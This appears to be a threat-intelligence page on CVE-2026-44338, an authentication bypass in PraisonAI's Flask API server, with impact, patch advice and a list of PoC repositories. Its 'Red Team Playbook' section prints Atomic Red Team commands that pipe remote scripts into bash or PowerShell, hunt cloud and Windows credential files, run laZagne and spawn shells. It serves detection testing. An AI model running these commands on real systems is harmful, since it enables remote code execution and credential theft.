CVE-2026-44338
Overview
The vulnerability is an authentication bypass in the legacy Flask API server component of PraisonAI versions 2.5.6 through 4.6.33. The root cause is that the Flask API server ships with authentication disabled by default, allowing unauthenticated access to sensitive API endpoints. Specifically, the /agents endpoint and the /chat endpoint, which triggers workflows defined in agents.yaml, are exposed without requiring token-based authentication.
Vulnerability Description
PraisonAI is a multi-agent teams system. From version 2.5.6 to before version 4.6.34, PraisonAI ships a legacy Flask API server with authentication disabled by default. When that server is used, any caller that can reach it can access /agents and trigger the configured agents.yaml workflow through /chat without providing a token. This issue has been patched in version 4.6.34.
Impact
An attacker can remotely access and enumerate configured agents and execute workflows on the PraisonAI system without any authentication or user interaction. This can lead to unauthorized command execution within the scope of the configured agents.yaml workflows, potentially resulting in data exposure, manipulation of agent behavior, or disruption of service. The vulnerability enables full control over agent operations accessible via the API, compromising system integrity and confidentiality in environments where the API is reachable.
Solution
Upgrade PraisonAI to version 4.6.34 or later, where the legacy Flask API server enforces authentication by default. Refer to the official security advisory GHSA-6rmh-7xcm-cpxj at https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6rmh-7xcm-cpxj for detailed patch instructions. No alternative workarounds are documented; applying the vendor-provided patch is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the multi-agent teams system, PraisonAI, arises from the inclusion of a legacy Flask API server that has authentication disabled by default in versions 2.5.6 through 4.6.34. This flaw allows any user with network access to the server to interact with sensitive endpoints, specifically the /agents endpoint, and to trigger workflows defined in the agents.yaml file via the /chat endpoint without any form of authentication. This lack of access control significantly increases the risk of unauthorized access and manipulation of the system's functionality, as it permits any caller to execute potentially harmful actions.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage network access to the vulnerable server, either from an internal network or through the internet if the server is exposed. The absence of authentication means that even a basic script or tool can be employed to send requests to the API endpoints, allowing the attacker to execute workflows that could lead to data exfiltration, service disruption, or unauthorized changes to the system's configuration. For instance, an attacker could trigger malicious workflows that manipulate data or cause the system to behave unexpectedly, leading to further exploitation or compromise.
The real-world impact of this vulnerability can be severe, particularly for organizations relying on PraisonAI for critical operations. The ability for unauthorized users to access and manipulate agent workflows poses significant business risks, including data breaches, operational disruptions, and reputational damage. If sensitive information is exposed or if the system is used to execute harmful actions, the consequences could extend beyond immediate financial losses to long-term trust issues with customers and partners. Furthermore, regulatory implications may arise if the compromised data includes personally identifiable information or other sensitive data subject to compliance requirements.
To detect and mitigate this vulnerability, organizations should first ensure that they are running a patched version of PraisonAI, specifically version 4.6.34 or later, where the issue has been resolved. Regularly updating software to the latest versions is a fundamental practice in cybersecurity hygiene. Additionally, network segmentation and firewall rules should be implemented to restrict access to the API server, ensuring that only trusted internal sources can communicate with it. Monitoring and logging API access attempts can also help detect unauthorized access patterns, allowing for timely responses to potential exploitation attempts. Implementing robust authentication mechanisms for the API server is essential to prevent similar vulnerabilities in the future.
In conclusion, the vulnerability in PraisonAI's legacy Flask API server highlights the critical importance of secure default configurations and robust authentication mechanisms in software development. The potential for exploitation poses significant risks to organizations, necessitating proactive measures to safeguard against unauthorized access and manipulation of sensitive workflows. By adopting comprehensive detection and mitigation strategies, organizations can better protect themselves from the threats posed by such vulnerabilities.
CSURFACE threat intelligence has observed a marked escalation in activity related to CVE-2026-44338, characterized by a notable surge in exploitation attempts and the emergence of new public proof-of-concept exploits hosted on GitHub. This development broadens the exploit landscape, lowering the barrier for adversaries to weaponize the vulnerability in PraisonAI’s legacy Flask API server. Although the EPSS score has slightly declined, our telemetry indicates an upward trend in exploitation attempts over the past week, signaling sustained attacker interest. The availability of multiple public exploit repositories increases the likelihood of opportunistic and less sophisticated threat actors engaging in attacks, thereby amplifying the risk to organizations that have not yet applied the patched version. This shift underscores the urgency for defenders to enhance detection capabilities and monitor for indicators linked to these new exploits. While the overall threat level remains high due to the vulnerability’s inherent severity, the expanded exploit toolkit and increased exploitation activity elevate the operational risk, particularly in environments where legacy configurations persist.
Update 2 — June 07, 2026
CSURFACE threat intelligence has detected a slight increase in activity exploiting CVE-2026-44338, despite a modest decline in its EPSS score. This divergence suggests that while the overall likelihood of exploitation as measured by predictive scoring has decreased, adversaries continue to probe and leverage the vulnerability opportunistically. The emergence of additional proof-of-concept exploits on public repositories further lowers the barrier for less sophisticated actors to attempt intrusions against unpatched PraisonAI deployments. Our telemetry indicates that this uptick is not yet a broad surge but signals persistent interest and potential for targeted attacks, particularly in environments where legacy Flask API servers remain active without authentication. Consequently, the operational risk remains elevated, with a subtle shift toward exploitation attempts by opportunistic threat actors rather than widespread automated campaigns. Defenders should remain vigilant as this pattern may presage more sustained or escalated exploitation efforts if patch adoption does not improve.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Praison | Praisonai | All |
cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
rootdirective-sec/CVE-2026-44338-Lab
|
rootdirective-sec | 0 | 0 | 2026-05-15 | View |
|
HORKimhab/CVE-2026-44338
CVE-2026-44338
|
HORKimhab | 0 | 0 | 2026-05-15 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Active exploitation confirmed — vendor: praison, product: praisonai
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-44338 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6rmh-7xcm-cpxj |